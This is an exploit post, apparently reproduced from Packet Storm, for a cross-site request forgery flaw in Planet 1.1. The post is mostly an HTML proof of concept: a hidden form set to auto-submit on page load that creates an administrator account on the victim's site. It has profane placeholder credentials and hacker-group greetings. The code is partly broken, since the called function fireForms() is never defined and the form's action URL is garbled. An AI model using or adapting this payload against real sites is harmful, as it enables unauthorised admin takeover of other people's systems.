Planet version 1.1 suffers from a cross site request forgery vulnerability.
f26496b0f11faf2f2aab122fc0408b582e7c06ff2e3feffb5a6c3f1cc91356f6
# Exploit Title: Planet 1.1 - [CSRF] Add Admin Account
# Date: 17-06-2010
# Author: G0D-F4Th3r
# Software Link: http://php.femtolayer.com/planet1_1/
# Version: 1.1
# Tested on: http://php.femtolayer.com/planet1_1/
##################################################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0"
action="http://www.site.com/[path]<http://www.site.com/%5Bpath%5D/admincp/staff.php?do=edit&id=1&go=update>
/cp/security.php?do=admins">
<input type="hidden" name="username" value="fuck"/>
<input type="hidden" name="password" value="fuckpass123"/>
<input type="hidden" name="pp" value=""/>
<input type="hidden" name="email" value="fuck@mail.com"/>
<input type="hidden" name="mobile" value="966555555555"/>
<input type="hidden" name="site" value="http://www.femtolayer.com"/>
<input type="hidden" name="location" value="US"/>
<input type="hidden" name="access" value="1"/>
</form>
</body>
</html>
###########################################################################
##############
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################
#######
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed